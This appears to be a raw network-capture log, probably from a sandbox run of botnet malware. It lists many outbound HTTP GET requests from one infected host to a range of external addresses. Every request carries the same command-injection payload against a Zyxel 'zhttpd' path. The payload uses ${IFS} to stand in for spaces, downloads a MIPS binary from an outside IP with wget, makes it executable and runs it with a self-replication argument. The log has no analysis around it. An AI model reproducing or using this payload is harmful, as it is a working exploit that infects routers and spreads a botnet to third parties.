                                        Jan 14, 2024 16:18:53.669569016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6684192.168.2.1335804149.61.239.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669606924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6685192.168.2.1339008201.252.51.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669625044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6686192.168.2.133931072.231.185.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669661999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6687192.168.2.136064682.136.158.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669701099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6688192.168.2.134463099.220.9.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669723988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6689192.168.2.134104824.138.136.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669758081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6690192.168.2.1341028155.222.154.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669830084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6691192.168.2.1351708206.180.94.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669852018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6692192.168.2.1334112171.204.73.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669913054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6693192.168.2.135230246.161.147.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669946909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6694192.168.2.133944078.78.223.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.669981003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6695192.168.2.1334412191.38.0.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670023918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6696192.168.2.135208639.159.53.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670080900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6697192.168.2.1354560221.215.111.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670144081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6698192.168.2.1335634207.180.91.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670188904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6699192.168.2.1355762206.100.154.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670228004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6700192.168.2.1357670108.101.41.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670273066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6701192.168.2.1354478133.54.138.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670320988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6702192.168.2.1351162136.151.20.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670377970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6703192.168.2.1337130143.28.80.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670409918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6704192.168.2.135776450.132.118.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670433044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6705192.168.2.1358898120.164.97.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670478106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6706192.168.2.1357858213.106.8.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670536041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6707192.168.2.1360046197.185.3.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670563936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6708192.168.2.133297894.229.52.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670599937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6709192.168.2.133677417.169.27.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670630932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6710192.168.2.1338442205.182.89.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670645952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6711192.168.2.1333336160.98.216.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670698881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6712192.168.2.1340440189.94.166.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670749903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6713192.168.2.1353944157.216.125.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670763969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6714192.168.2.1337224195.148.88.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670828104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6715192.168.2.134255282.244.113.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670864105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6716192.168.2.1337764180.211.58.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.670994043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6717192.168.2.136096448.221.162.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671030998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6718192.168.2.1349580124.48.192.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671065092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6719192.168.2.1340528211.153.113.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671093941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6720192.168.2.13336229.171.88.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671154022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6721192.168.2.1335186122.143.209.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671216965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6722192.168.2.135330653.241.140.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671221972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6723192.168.2.1335316163.249.205.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671231031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6724192.168.2.134973612.63.87.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671242952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6725192.168.2.135473679.95.85.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671303034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6726192.168.2.135513293.29.148.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671351910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6727192.168.2.135477081.131.62.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671391964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6728192.168.2.1345524142.136.87.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671444893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6729192.168.2.135541432.253.183.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671473026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6730192.168.2.1347532159.154.104.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671504021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6731192.168.2.135976492.203.140.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671554089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6732192.168.2.135422647.2.206.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671587944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6733192.168.2.134835291.66.95.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671618938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6734192.168.2.1356416101.147.218.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671678066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6735192.168.2.1333716124.255.199.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671705008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6736192.168.2.13329561.199.104.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671719074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6737192.168.2.133316859.115.111.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671749115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6738192.168.2.1360150141.52.231.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671782017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6739192.168.2.1336818205.141.194.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671798944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6740192.168.2.1354468162.193.11.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671845913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6741192.168.2.1338938153.21.133.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671875000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6742192.168.2.136053095.131.251.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671920061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6743192.168.2.133819045.245.147.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671984911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6744192.168.2.1351158178.0.5.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.671998978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6745192.168.2.1341598142.121.246.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.672055960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6746192.168.2.1342736117.55.214.5443
                                        TimestampBytes transferredDirectionData
